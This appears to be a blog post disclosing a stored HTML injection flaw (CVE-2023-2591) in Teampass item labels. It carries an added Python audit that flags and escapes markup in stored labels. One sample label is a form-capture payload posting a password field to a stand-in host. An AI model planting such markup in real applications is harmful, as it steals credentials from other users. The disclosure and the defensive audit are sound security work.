CVE-2023-2591: Stored HTML Injection in Item Label in Teampass 3.0.6

M Nadeem Qazi
2 min read · May 9, 2023


I recently identified a security vulnerability in nilsteampassnet/teampass, a popular password management tool. This vulnerability, identified as CVE-2023-2591, is a stored HTML injection vulnerability in the item label field. If two users have access to the same folder, a malicious user can create an item whose label field carries injected HTML. When other users view that item, the injected markup may redirect them to the attacker’s website or capture their data using a form.

PoC:

I reported this vulnerability to the nilsteampassnet/teampass team, and it was validated and fixed in version 3.0.7 with commit 57a977. The team also awarded me the disclosure bounty for my report.
The impact of this vulnerability could have been significant, as malicious actors could have exploited it to carry out HTML injection attacks, potentially redirecting other users to an attacker’s website or capturing their sensitive data through a form. This could result in the theft of confidential information, financial loss, and reputational damage to the affected users or organizations. It could have also led to a wider breach of security, affecting other users who interact with the compromised item or website.

I want to stress the importance of regularly updating software and implementing secure coding practices to prevent such vulnerabilities. I hope my report will help raise awareness about the potential risks of such vulnerabilities and encourage users to take necessary precautions.
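An added example, not from the original post or the Teampass code base: a defensive audit that flags stored item labels containing HTML elements and produces the escaped form a page should emit when displaying them. The function names, the `(item_id, label)` row shape and the sample labels are assumptions constructed for illustration; it does not reproduce how Teampass 3.0.7 fixes the issue.

```python
import html
from html.parser import HTMLParser

# Elements that can collect input from the viewing user (the form-capture impact).
CAPTURE_TAGS = {"form", "input", "button", "textarea", "select"}


class TagCollector(HTMLParser):
    """Records the name of every element the HTML parser recognises."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def audit_label(label):
    """Audit one stored label: which elements it contains and its escaped form."""
    collector = TagCollector()
    collector.feed(label)
    collector.close()
    return {
        "tags": collector.tags,
        "has_markup": bool(collector.tags),
        "capture_risk": any(t in CAPTURE_TAGS for t in collector.tags),
        # What the page should emit so the label renders as inert text.
        "safe_html": html.escape(label, quote=True),
    }


def audit_labels(rows):
    """rows: iterable of (item_id, label); returns only the rows containing markup."""
    audited = ((item_id, audit_label(label)) for item_id, label in rows)
    return [(item_id, result) for item_id, result in audited if result["has_markup"]]


# Constructed sample rows; not taken from Teampass or from the report.
SAMPLE_ROWS = [
    (1, "Prod DB root"),
    (2, "VPN <b>new</b>"),
    (3, '<form action="https://example.invalid/x"><input name="pw"></form>'),
    (4, "size < 10 and > 2"),  # comparison signs only: text, not markup
]

if __name__ == "__main__":
    for item_id, result in audit_labels(SAMPLE_ROWS):
        kind = "capture" if result["capture_risk"] else "markup"
        print(item_id, kind, result["tags"], result["safe_html"])
```

Running an audit like this over labels created before the upgrade shows whether any stored entries still carry markup that would need cleaning or escaping at display time.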

If you’re interested in learning more about my findings, check out the report on huntr.dev: https://huntr.dev/bounties/705f79f4-f5e3-41d7-82a5-f00441cd984b/

You can also follow me for updates on my research and other security-related topics.
Instagram — @mnqazi
Twitter — @mnqazi
Facebook — @mnqazi
LinkedIn: M_Nadeem_Qazi

Stay safe out there!

#securityresearch #pentesting #vulnerabilitymanagement #informationsecurity #cybersecurity #HTMLinjection #passwordmanagement #teampass #bugbounty #ethicalhacking #hacker #CVE_2023_2591 #mnqazi #infosec #securityawareness #cyberawareness #cyberdefense #cyberthreats

M Nadeem Qazi

Cyber Security(R&D) | Security Researcher | Hacker (CEH v11) | Bug Hunter | Developer | CCIO | CVE-2023-2516 | CVE-2023-2591